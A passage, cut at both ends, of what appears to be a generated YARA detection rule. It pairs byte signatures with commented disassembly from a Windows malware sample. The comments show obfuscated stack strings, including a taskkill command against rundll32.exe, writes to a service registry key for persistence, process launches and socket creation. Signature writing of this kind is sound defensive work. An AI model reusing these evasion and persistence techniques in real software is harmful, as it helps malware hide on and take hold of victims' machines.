eax,dword [esp + 4] + .text:0x00406cd7 6a0a push 10 + .text:0x00406cd9 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00406cdd 50 push eax + .text:0x00406cde 51 push ecx + .text:0x00406cdf 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00406ce5 e866dcffff call 0x00404950 ;sub_00404950(local256,local268,10) + .text:0x00406cea 6a00 push 0 + .text:0x00406cec ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406cee 8b942418010000 mov edx,dword [esp + 280] + .text:0x00406cf5 8b842414010000 mov eax,dword [esp + 276] + .text:0x00406cfc 81e2ffff0000 and edx,0x0000ffff + .text:0x00406d02 8d4c2410 lea ecx,dword [esp + 16] + .text:0x00406d06 52 push edx + .text:0x00406d07 50 push eax + .text:0x00406d08 51 push ecx + .text:0x00406d09 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00406d0f e8dcdcffff call 0x004049f0 ;sub_004049f0(local256,arg0,0x0000300f) + .text:0x00406d14 6a00 push 0 + .text:0x00406d16 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406d18 5e pop esi + .text:0x00406d19 81c40c010000 add esp,268 + .text:0x00406d1f c3 ret + */ + $c9 = { 81 EC 0C 01 00 00 56 8B 35 ?? ?? ?? ?? 6A 00 C6 44 24 ?? 4D C6 44 24 ?? 6F C6 44 24 ?? 74 C6 44 24 ?? 68 C6 44 24 ?? 65 C6 44 24 ?? 72 C6 44 24 ?? 33 C6 44 24 ?? 36 C6 44 24 ?? 30 C6 44 24 ?? 00 FF D6 8D 44 24 ?? 6A 0A 8D 4C 24 ?? 50 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D6 8B 94 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 81 E2 FF FF 00 00 8D 4C 24 ?? 52 50 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D6 5E 81 C4 0C 01 00 00 C3 } + /* +Basic Block at 0x00406db0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00406db0 + .text:0x00406db0 FUNC: int cdecl sub_00406db0( ) [2 XREFS] + .text:0x00406db0 + .text:0x00406db0 Stack Variables: (offset from initial top of stack) + .text:0x00406db0 -8: int local8 + .text:0x00406db0 -9: int local9 + .text:0x00406db0 -10: int local10 + .text:0x00406db0 -11: int local11 + .text:0x00406db0 -12: int local12 + .text:0x00406db0 -13: int local13 + .text:0x00406db0 -14: int local14 + .text:0x00406db0 -15: int local15 + .text:0x00406db0 -16: int local16 + .text:0x00406db0 -17: int local17 + .text:0x00406db0 -18: int local18 + .text:0x00406db0 -19: int local19 + .text:0x00406db0 -20: int local20 + .text:0x00406db0 -24: int local24 + .text:0x00406db0 -25: int local25 + .text:0x00406db0 -26: int local26 + .text:0x00406db0 -27: int local27 + .text:0x00406db0 -28: int local28 + .text:0x00406db0 -29: int local29 + .text:0x00406db0 -30: int local30 + .text:0x00406db0 -31: int local31 + .text:0x00406db0 -32: int local32 + .text:0x00406db0 -33: int local33 + .text:0x00406db0 -34: int local34 + .text:0x00406db0 -35: int local35 + .text:0x00406db0 -36: int local36 + .text:0x00406db0 -37: int local37 + .text:0x00406db0 -38: int local38 + .text:0x00406db0 -39: int local39 + .text:0x00406db0 -40: int local40 + .text:0x00406db0 -41: int local41 + .text:0x00406db0 -42: int local42 + .text:0x00406db0 -43: int local43 + .text:0x00406db0 -44: int local44 + .text:0x00406db0 -45: int local45 + .text:0x00406db0 -46: int local46 + .text:0x00406db0 -47: int local47 + .text:0x00406db0 -48: int local48 + .text:0x00406db0 -49: int local49 + .text:0x00406db0 -50: int local50 + .text:0x00406db0 -51: int local51 + .text:0x00406db0 -52: int local52 + .text:0x00406db0 + .text:0x00406db0 55 push ebp + .text:0x00406db1 8bec mov ebp,esp + .text:0x00406db3 83ec30 sub esp,48 + .text:0x00406db6 53 push ebx + .text:0x00406db7 56 push esi + .text:0x00406db8 90 nop + .text:0x00406db9 8b3578904000 mov esi,dword [0x00409078] + .text:0x00406dbf 6a00 push 0 + .text:0x00406dc1 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406dc3 b36c mov bl,108 + .text:0x00406dc5 6a00 push 0 + .text:0x00406dc7 c645f072 mov byte [ebp - 16],114 + .text:0x00406dcb c645f175 mov byte [ebp - 15],117 + .text:0x00406dcf c645f26e mov byte [ebp - 14],110 + .text:0x00406dd3 c645f364 mov byte [ebp - 13],100 + .text:0x00406dd7 885df4 mov byte [ebp - 12],bl + .text:0x00406dda 885df5 mov byte [ebp - 11],bl + .text:0x00406ddd c645f633 mov byte [ebp - 10],51 + .text:0x00406de1 c645f732 mov byte [ebp - 9],50 + .text:0x00406de5 c645f82e mov byte [ebp - 8],46 + .text:0x00406de9 c645f965 mov byte [ebp - 7],101 + .text:0x00406ded c645fa78 mov byte [ebp - 6],120 + .text:0x00406df1 c645fb65 mov byte [ebp - 5],101 + .text:0x00406df5 c645fc00 mov byte [ebp - 4],0 + .text:0x00406df9 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406dfb 6a00 push 0 + .text:0x00406dfd ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406dff 90 nop + .text:0x00406e00 8d45f0 lea eax,dword [ebp - 16] + .text:0x00406e03 50 push eax + .text:0x00406e04 e8670b0000 call 0x00407970 ;sub_00407970(local20) + .text:0x00406e09 83c404 add esp,4 + .text:0x00406e0c 85c0 test eax,eax + .text:0x00406e0e 0f8496000000 jz 0x00406eaa + */ + $c10 = { 55 8B EC 83 EC 30 53 56 90 8B 35 ?? ?? ?? ?? 6A 00 FF D6 B3 6C 6A 00 C6 45 ?? 72 C6 45 ?? 75 C6 45 ?? 6E C6 45 ?? 64 88 5D ?? 88 5D ?? C6 45 ?? 33 C6 45 ?? 32 C6 45 ?? 2E C6 45 ?? 65 C6 45 ?? 78 C6 45 ?? 65 C6 45 ?? 00 FF D6 6A 00 FF D6 90 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 04 85 C0 0F 84 ?? ?? ?? ?? } + /* +Basic Block at 0x00406e14@9324d1a8ae37a36ae560c37448c9705a with 2 features: + - contain obfuscated stackstrings + - create process on Windows + .text:0x00406e14 6a00 push 0 + .text:0x00406e16 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406e18 6a00 push 0 + .text:0x00406e1a ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406e1c 90 nop + .text:0x00406e1d b06b mov al,107 + .text:0x00406e1f b269 mov dl,105 + .text:0x00406e21 8845d3 mov byte [ebp - 45],al + .text:0x00406e24 8845d4 mov byte [ebp - 44],al + .text:0x00406e27 b020 mov al,32 + .text:0x00406e29 b12f mov cl,47 + .text:0x00406e2b 6a00 push 0 + .text:0x00406e2d c645d074 mov byte [ebp - 48],116 + .text:0x00406e31 c645d161 mov byte [ebp - 47],97 + .text:0x00406e35 c645d273 mov byte [ebp - 46],115 + .text:0x00406e39 8855d5 mov byte [ebp - 43],dl + .text:0x00406e3c 885dd6 mov byte [ebp - 42],bl + .text:0x00406e3f 885dd7 mov byte [ebp - 41],bl + .text:0x00406e42 8845d8 mov byte [ebp - 40],al + .text:0x00406e45 884dd9 mov byte [ebp - 39],cl + .text:0x00406e48 c645da66 mov byte [ebp - 38],102 + .text:0x00406e4c 8845db mov byte [ebp - 37],al + .text:0x00406e4f 884ddc mov byte [ebp - 36],cl + .text:0x00406e52 8855dd mov byte [ebp - 35],dl + .text:0x00406e55 c645de6d mov byte [ebp - 34],109 + .text:0x00406e59 8845df mov byte [ebp - 33],al + .text:0x00406e5c c645e072 mov byte [ebp - 32],114 + .text:0x00406e60 c645e175 mov byte [ebp - 31],117 + .text:0x00406e64 c645e26e mov byte [ebp - 30],110 + .text:0x00406e68 c645e364 mov byte [ebp - 29],100 + .text:0x00406e6c 885de4 mov byte [ebp - 28],bl + .text:0x00406e6f 885de5 mov byte [ebp - 27],bl + .text:0x00406e72 c645e633 mov byte [ebp - 26],51 + .text:0x00406e76 c645e732 mov byte [ebp - 25],50 + .text:0x00406e7a c645e82e mov byte [ebp - 24],46 + .text:0x00406e7e c645e965 mov byte [ebp - 23],101 + .text:0x00406e82 c645ea78 mov byte [ebp - 22],120 + .text:0x00406e86 c645eb65 mov byte [ebp - 21],101 + .text:0x00406e8a c645ec00 mov byte [ebp - 20],0 + .text:0x00406e8e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406e90 6a00 push 0 + .text:0x00406e92 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406e94 90 nop + .text:0x00406e95 6a00 push 0 + .text:0x00406e97 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406e99 90 nop + .text:0x00406e9a 8d4dd0 lea ecx,dword [ebp - 48] + .text:0x00406e9d 6a00 push 0 + .text:0x00406e9f 51 push ecx + .text:0x00406ea0 ff1530914000 call dword [0x00409130] ;kernel32.WinExec(local52,0) + .text:0x00406ea6 6a00 push 0 + .text:0x00406ea8 ffd6 call esi ;kernel32.Sleep(0) + */ + $c11 = { 6A 00 FF D6 6A 00 FF D6 90 B0 6B B2 69 88 45 ?? 88 45 ?? B0 20 B1 2F 6A 00 C6 45 ?? 74 C6 45 ?? 61 C6 45 ?? 73 88 55 ?? 88 5D ?? 88 5D ?? 88 45 ?? 88 4D ?? C6 45 ?? 66 88 45 ?? 88 4D ?? 88 55 ?? C6 45 ?? 6D 88 45 ?? C6 45 ?? 72 C6 45 ?? 75 C6 45 ?? 6E C6 45 ?? 64 88 5D ?? 88 5D ?? C6 45 ?? 33 C6 45 ?? 32 C6 45 ?? 2E C6 45 ?? 65 C6 45 ?? 78 C6 45 ?? 65 C6 45 ?? 00 FF D6 6A 00 FF D6 90 6A 00 FF D6 90 8D 4D ?? 6A 00 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 } + /* +Basic Block at 0x0040730f@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x0040730f loc_0040730f: [1 XREFS] + .text:0x0040730f 53 push ebx + .text:0x00407310 c645f425 mov byte [ebp - 12],37 + .text:0x00407314 c645f573 mov byte [ebp - 11],115 + .text:0x00407318 c645f600 mov byte [ebp - 10],0 + .text:0x0040731c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040731e 8d55f4 lea edx,dword [ebp - 12] + .text:0x00407321 6818a24000 push 0x0040a218 + .text:0x00407326 52 push edx + .text:0x00407327 6818a24000 push 0x0040a218 + .text:0x0040732c e88f0b0000 call 0x00407ec0 ;msvcrt.sprintf(0x0040a218,local16) + .text:0x00407331 83c40c add esp,12 + .text:0x00407334 53 push ebx + .text:0x00407335 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407337 53 push ebx + .text:0x00407338 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040733a 53 push ebx + .text:0x0040733b c645e443 mov byte [ebp - 28],67 + .text:0x0040733f c645e56f mov byte [ebp - 27],111 + .text:0x00407343 c645e66e mov byte [ebp - 26],110 + .text:0x00407347 c645e76e mov byte [ebp - 25],110 + .text:0x0040734b c645e865 mov byte [ebp - 24],101 + .text:0x0040734f c645e963 mov byte [ebp - 23],99 + .text:0x00407353 c645ea74 mov byte [ebp - 22],116 + .text:0x00407357 c645eb47 mov byte [ebp - 21],71 + .text:0x0040735b c645ec72 mov byte [ebp - 20],114 + .text:0x0040735f c645ed6f mov byte [ebp - 19],111 + .text:0x00407363 c645ee75 mov byte [ebp - 18],117 + .text:0x00407367 c645ef70 mov byte [ebp - 17],112 + .text:0x0040736b c645f000 mov byte [ebp - 16],0 + .text:0x0040736f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407371 53 push ebx + .text:0x00407372 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407374 53 push ebx + .text:0x00407375 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407377 53 push ebx + .text:0x00407378 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040737a 8d85acf8ffff lea eax,dword [ebp - 1876] + .text:0x00407380 6800040000 push 1024 + .text:0x00407385 8d4de4 lea ecx,dword [ebp - 28] + .text:0x00407388 50 push eax + .text:0x00407389 51 push ecx + .text:0x0040738a 6818a24000 push 0x0040a218 + .text:0x0040738f e8ccdbffff call 0x00404f60 ;sub_00404f60(0x0040a218,local32,local1880,1024) + .text:0x00407394 83c410 add esp,16 + .text:0x00407397 53 push ebx + .text:0x00407398 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040739a 53 push ebx + .text:0x0040739b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040739d 53 push ebx + .text:0x0040739e ffd6 call esi ;kernel32.Sleep(0) + .text:0x004073a0 8d95acf8ffff lea edx,dword [ebp - 1876] + .text:0x004073a6 52 push edx + .text:0x004073a7 ff15c4904000 call dword [0x004090c4] ;kernel32.lstrlenA(local1880) + .text:0x004073ad 85c0 test eax,eax + .text:0x004073af 751f jnz 0x004073d0 + */ + $c12 = { 53 C6 45 ?? 25 C6 45 ?? 73 C6 45 ?? 00 FF D6 8D 55 ?? 68 18 A2 40 00 52 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 0C 53 FF D6 53 FF D6 53 C6 45 ?? 43 C6 45 ?? 6F C6 45 ?? 6E C6 45 ?? 6E C6 45 ?? 65 C6 45 ?? 63 C6 45 ?? 74 C6 45 ?? 47 C6 45 ?? 72 C6 45 ?? 6F C6 45 ?? 75 C6 45 ?? 70 C6 45 ?? 00 FF D6 53 FF D6 53 FF D6 53 FF D6 8D 85 ?? ?? ?? ?? 68 00 04 00 00 8D 4D ?? 50 51 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 10 53 FF D6 53 FF D6 53 FF D6 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? } + /* +Basic Block at 0x0040764a@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x0040764a 6a00 push 0 + .text:0x0040764c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040764e b053 mov al,83 + .text:0x00407650 8885a4fcffff mov byte [ebp - 860],al + .text:0x00407656 c685a5fcffff59 mov byte [ebp - 859],89 + .text:0x0040765d 8885a6fcffff mov byte [ebp - 858],al + .text:0x00407663 c685a7fcffff54 mov byte [ebp - 857],84 + .text:0x0040766a c685a8fcffff45 mov byte [ebp - 856],69 + .text:0x00407671 c685a9fcffff4d mov byte [ebp - 855],77 + .text:0x00407678 b15c mov cl,92 + .text:0x0040767a 888daafcffff mov byte [ebp - 854],cl + .text:0x00407680 b243 mov dl,67 + .text:0x00407682 8895abfcffff mov byte [ebp - 853],dl + .text:0x00407688 c685acfcffff75 mov byte [ebp - 852],117 + .text:0x0040768f c685adfcffff72 mov byte [ebp - 851],114 + .text:0x00407696 c685aefcffff72 mov byte [ebp - 850],114 + .text:0x0040769d b365 mov bl,101 + .text:0x0040769f 889daffcffff mov byte [ebp - 849],bl + .text:0x004076a5 c685b0fcffff6e mov byte [ebp - 848],110 + .text:0x004076ac c685b1fcffff74 mov byte [ebp - 847],116 + .text:0x004076b3 8895b2fcffff mov byte [ebp - 846],dl + .text:0x004076b9 c685b3fcffff6f mov byte [ebp - 845],111 + .text:0x004076c0 c685b4fcffff6e mov byte [ebp - 844],110 + .text:0x004076c7 c685b5fcffff74 mov byte [ebp - 843],116 + .text:0x004076ce c685b6fcffff72 mov byte [ebp - 842],114 + .text:0x004076d5 c685b7fcffff6f mov byte [ebp - 841],111 + .text:0x004076dc c685b8fcffff6c mov byte [ebp - 840],108 + .text:0x004076e3 8885b9fcffff mov byte [ebp - 839],al + .text:0x004076e9 889dbafcffff mov byte [ebp - 838],bl + .text:0x004076ef c685bbfcffff74 mov byte [ebp - 837],116 + .text:0x004076f6 888dbcfcffff mov byte [ebp - 836],cl + .text:0x004076fc 8885bdfcffff mov byte [ebp - 835],al + .text:0x00407702 889dbefcffff mov byte [ebp - 834],bl + .text:0x00407708 c685bffcffff72 mov byte [ebp - 833],114 + .text:0x0040770f c685c0fcffff76 mov byte [ebp - 832],118 + .text:0x00407716 c685c1fcffff69 mov byte [ebp - 831],105 + .text:0x0040771d c685c2fcffff63 mov byte [ebp - 830],99 + .text:0x00407724 889dc3fcffff mov byte [ebp - 829],bl + .text:0x0040772a c685c4fcffff73 mov byte [ebp - 828],115 + .text:0x00407731 888dc5fcffff mov byte [ebp - 827],cl + .text:0x00407737 c685c6fcffff00 mov byte [ebp - 826],0 + .text:0x0040773e 6a00 push 0 + .text:0x00407740 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407742 8d8da4fcffff lea ecx,dword [ebp - 860] + .text:0x00407748 51 push ecx + .text:0x00407749 8d95e4feffff lea edx,dword [ebp - 284] + .text:0x0040774f 52 push edx + .text:0x00407750 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407756 e815d0ffff call 0x00404770 ;sub_00404770(local288,local864) + .text:0x0040775b 6a00 push 0 + .text:0x0040775d ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040775f 8b450c mov eax,dword [ebp + 12] + .text:0x00407762 50 push eax + .text:0x00407763 8d8de4feffff lea ecx,dword [ebp - 284] + .text:0x00407769 51 push ecx + .text:0x0040776a 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407770 e83bcfffff call 0x004046b0 ;sub_004046b0(local288,arg1) + .text:0x00407775 6a00 push 0 + .text:0x00407777 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407779 8d95dcfdffff lea edx,dword [ebp - 548] + .text:0x0040777f 52 push edx + .text:0x00407780 8d85e4feffff lea eax,dword [ebp - 284] + .text:0x00407786 50 push eax + .text:0x00407787 6802000080 push 0x80000002 + .text:0x0040778c ff1520904000 call dword [0x00409020] ;advapi32.RegOpenKeyA(0x80000002,local288,local552) + .text:0x00407792 6a00 push 0 + .text:0x00407794 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407796 c68594fcffff44 mov byte [ebp - 876],68 + .text:0x0040779d 889d95fcffff mov byte [ebp - 875],bl + .text:0x004077a3 c68596fcffff73 mov byte [ebp - 874],115 + .text:0x004077aa c68597fcffff63 mov byte [ebp - 873],99 + .text:0x004077b1 c68598fcffff72 mov byte [ebp - 872],114 + .text:0x004077b8 c68599fcffff69 mov byte [ebp - 871],105 + .text:0x004077bf c6859afcffff70 mov byte [ebp - 870],112 + .text:0x004077c6 c6859bfcffff74 mov byte [ebp - 869],116 + .text:0x004077cd c6859cfcffff69 mov byte [ebp - 868],105 + .text:0x004077d4 c6859dfcffff6f mov byte [ebp - 867],111 + .text:0x004077db c6859efcffff6e mov byte [ebp - 866],110 + .text:0x004077e2 c6859ffcffff00 mov byte [ebp - 865],0 + .text:0x004077e9 6a00 push 0 + .text:0x004077eb ffd6 call esi ;kernel32.Sleep(0) + .text:0x004077ed 8b5d14 mov ebx,dword [ebp + 20] + .text:0x004077f0 53 push ebx + .text:0x004077f1 ff15c4904000 call dword [0x004090c4] ;kernel32.lstrlenA(arg3) + .text:0x004077f7 50 push eax + .text:0x004077f8 53 push ebx + .text:0x004077f9 6a01 push 1 + .text:0x004077fb 6a00 push 0 + .text:0x004077fd 8d8d94fcffff lea ecx,dword [ebp - 876] + .text:0x00407803 51 push ecx + .text:0x00407804 8b95dcfdffff mov edx,dword [ebp - 548] + .text:0x0040780a 52 push edx + .text:0x0040780b ff1500904000 call dword [0x00409000] ;advapi32.RegSetValueExA(0,local880,0,1,arg3,kernel32.lstrlenA(arg3)) + .text:0x00407811 8b9dd4fcffff mov ebx,dword [ebp - 812] + */ + $c13 = { 6A 00 FF D6 B0 53 88 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 59 88 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 54 C6 85 ?? ?? ?? ?? 45 C6 85 ?? ?? ?? ?? 4D B1 5C 88 8D ?? ?? ?? ?? B2 43 88 95 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 75 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 72 B3 65 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 74 88 95 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 6F C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 6F C6 85 ?? ?? ?? ?? 6C 88 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 74 88 8D ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 76 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 63 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 73 88 8D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 00 6A 00 FF D6 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D6 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 68 02 00 00 80 FF 15 ?? ?? ?? ?? 6A 00 FF D6 C6 85 ?? ?? ?? ?? 44 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 73 C6 85 ?? ?? ?? ?? 63 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6F C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 00 6A 00 FF D6 8B 5D ?? 53 FF 15 ?? ?? ?? ?? 50 53 6A 01 6A 00 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? } + /* +Basic Block at 0x00401867@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - create TCP socket + .text:0x00401867 loc_00401867: [3 XREFS] + .text:0x00401867 6a06 push 6 + .text:0x00401869 6a01 push 1 + .text:0x0040186b 6a02 push 2 + .text:0x0040186d ff1500924000 call dword [0x00409200] ;ws2_32.socket(2,1,6) + .text:0x00401873 83f8ff cmp eax,0xffffffff + .text:0x00401876 8986a8000000 mov dword [esi + 168],eax + .text:0x0040187c 750b jnz 0x00401889 + */ + $c14 = { 6A 06 6A 01 6A 02 FF 15 ?? ?? ?? ?? 83 F8 FF 89 86 ?? ?? ?? ?? 75 ?? } + /* +Basic Block at 0x00402a71@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - get file attributes + .text:0x00402a71 8b4c246c mov ecx,dword [esp + 108] + .text:0x00402a75 51 push ecx + .text:0x00402a76 e8d5feffff call 0x00402950 ;sub_00402950(0,0,arg1,arg1) + .text:0x00402a7b 83c404 add esp,4 + .text:0x00402a7e 55 push ebp + .text:0x00402a7f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402a81 68b8a84000 push 0x0040a8b8 + .text:0x00402a86 ff15bc904000 call dword [0x004090bc] ;kernel32.GetFileAttributesA(0x0040a8b8) + .text:0x00402a8c 83f8ff cmp eax,0xffffffff + .text:0x00402a8f 7475 jz 0x00402b06 + */ + $c15 = { 8B 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 04 55 FF D6 68 B8 A8 40 00 FF 15 ?? ?? ?? ?? 83 F8 FF 74 ?? } + /* +Basic Block at 0x00403b43@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - get file attributes + .text:0x00403b43 6a00 push 0 + .text:0x00403b45 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403b47 8d4c2454 lea ecx,dword [esp + 84] + .text:0x00403b4b c64424086f mov byte [esp + 8],111 + .text:0x00403b50 51 push ecx + .text:0x00403b51 c644240d70 mov byte [esp + 13],112 + .text:0x00403b56 c644240e65 mov byte [esp + 14],101 + .text:0x00403b5b c644240f6e mov byte [esp + 15],110 + .text:0x00403b60 c644241000 mov byte [esp + 16],0 + .text:0x00403b65 ff15bc904000 call dword [0x004090bc] ;kernel32.GetFileAttributesA(local260) + .text:0x00403b6b 83f8ff cmp eax,0xffffffff + .text:0x00403b6e 7420 jz 0x00403b90 + */ + $c16 = { 6A 00 FF D6 8D 4C 24 ?? C6 44 24 ?? 6F 51 C6 44 24 ?? 70 C6 44 24 ?? 65 C6 44 24 ?? 6E C6 44 24 ?? 00 FF 15 ?? ?? ?? ?? 83 F8 FF 74 ?? } + /* +Basic Block at 0x00403b70@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - create process on Windows + .text:0x00403b70 6a00 push 0 + .text:0x00403b72 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403b74 6a05 push 5 + .text:0x00403b76 6a00 push 0 + .text:0x00403b78 8d54245c lea edx,dword [esp + 92] + .text:0x00403b7c 6a00 push 0 + .text:0x00403b7e 8d442414 lea eax,dword [esp + 20] + .text:0x00403b82 52 push edx + .text:0x00403b83 50 push eax + .text:0x00403b84 6a00 push 0 + .text:0x00403b86 ff15ac914000 call dword [0x004091ac] ;shell32.ShellExecuteA(0,local336,local260,0,0,5) + .text:0x00403b8c 6a00 push 0 + .text:0x00403b8e ffd6 call esi ;kernel32.Sleep(0) + */ + $c17 = { 6A 00 FF D6 6A 05 6A 00 8D 54 24 ?? 6A 00 8D 44 24 ?? 52 50 6A 00 FF 15 ?? ?? ?? ?? 6A 00 FF D6 } + /* +Basic Block at 0x0040728d@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - create process on Windows + .text:0x0040728d 6a00 push 0 + .text:0x0040728f c745f400000000 mov dword [ebp - 12],0 + .text:0x00407296 c645dc6f mov byte [ebp - 36],111 + .text:0x0040729a c645dd70 mov byte [ebp - 35],112 + .text:0x0040729e c645de65 mov byte [ebp - 34],101 + .text:0x004072a2 c645df6e mov byte [ebp - 33],110 + .text:0x004072a6 c645e000 mov byte [ebp - 32],0 + .text:0x004072aa ffd6 call esi ;kernel32.Sleep(0) + .text:0x004072ac 6a05 push 5 + .text:0x004072ae 6a00 push 0 + .text:0x004072b0 8d95b0fdffff lea edx,dword [ebp - 592] + .text:0x004072b6 6a00 push 0 + .text:0x004072b8 8d45dc lea eax,dword [ebp - 36] + .text:0x004072bb 52 push edx + .text:0x004072bc 50 push eax + .text:0x004072bd 6a00 push 0 + .text:0x004072bf ffd7 call edi ;shell32.ShellExecuteA(0,local40,local596,0,0,5) + .text:0x004072c1 6a00 push 0 + .text:0x004072c3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004072c5 43 inc ebx + .text:0x004072c6 83fb03 cmp ebx,3 + .text:0x004072c9 7335 jnc 0x00407300 + */ + $c18 = { 6A 00 C7 45 ?? 00 00 00 00 C6 45 ?? 6F C6 45 ?? 70 C6 45 ?? 65 C6 45 ?? 6E C6 45 ?? 00 FF D6 6A 05 6A 00 8D 95 ?? ?? ?? ?? 6A 00 8D 45 ?? 52 50 6A 00 FF D7 6A 00 FF D6 43 83 FB 03 73 ?? } + /* +Basic Block at 0x004078e0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - create thread + .text:0x004078e0 + .text:0x004078e0 FUNC: int cdecl sub_004078e0( int arg0, int arg1, int arg2, int arg3, int arg4, int arg5, int arg6, ) [10 XREFS] + .text:0x004078e0 + .text:0x004078e0 Stack Variables: (offset from initial top of stack) + .text:0x004078e0 28: int arg6 + .text:0x004078e0 24: int arg5 + .text:0x004078e0 20: int arg4 + .text:0x004078e0 16: int arg3 + .text:0x004078e0 12: int arg2 + .text:0x004078e0 8: int arg1 + .text:0x004078e0 4: int arg0 + .text:0x004078e0 -4: int local4 + .text:0x004078e0 -8: int local8 + .text:0x004078e0 -12: int local12 + .text:0x004078e0 -16: int local16 + .text:0x004078e0 + .text:0x004078e0 83ec10 sub esp,16 + .text:0x004078e3 8b44241c mov eax,dword [esp + 28] + .text:0x004078e7 8b4c2420 mov ecx,dword [esp + 32] + .text:0x004078eb 8a54242c mov dl,byte [esp + 44] + .text:0x004078ef 56 push esi + .text:0x004078f0 8b3578904000 mov esi,dword [0x00409078] + .text:0x004078f6 6a00 push 0 + .text:0x004078f8 89442408 mov dword [esp + 8],eax + .text:0x004078fc 894c240c mov dword [esp + 12],ecx + .text:0x00407900 88542410 mov byte [esp + 16],dl + .text:0x00407904 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407906 6a00 push 0 + .text:0x00407908 6a00 push 0 + .text:0x0040790a 6a00 push 0 + .text:0x0040790c 6a00 push 0 + .text:0x0040790e ff1584904000 call dword [0x00409084] ;kernel32.CreateEventA(0,0,0,0) + .text:0x00407914 6a00 push 0 + .text:0x00407916 89442414 mov dword [esp + 20],eax + .text:0x0040791a ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040791c 8b4c2428 mov ecx,dword [esp + 40] + .text:0x00407920 8d442430 lea eax,dword [esp + 48] + .text:0x00407924 50 push eax + .text:0x00407925 8b442420 mov eax,dword [esp + 32] + .text:0x00407929 8d542408 lea edx,dword [esp + 8] + .text:0x0040792d 51 push ecx + .text:0x0040792e 8b4c2420 mov ecx,dword [esp + 32] + .text:0x00407932 52 push edx + .text:0x00407933 6890784000 push 0x00407890 + .text:0x00407938 50 push eax + .text:0x00407939 51 push ecx + .text:0x0040793a e88d050000 call 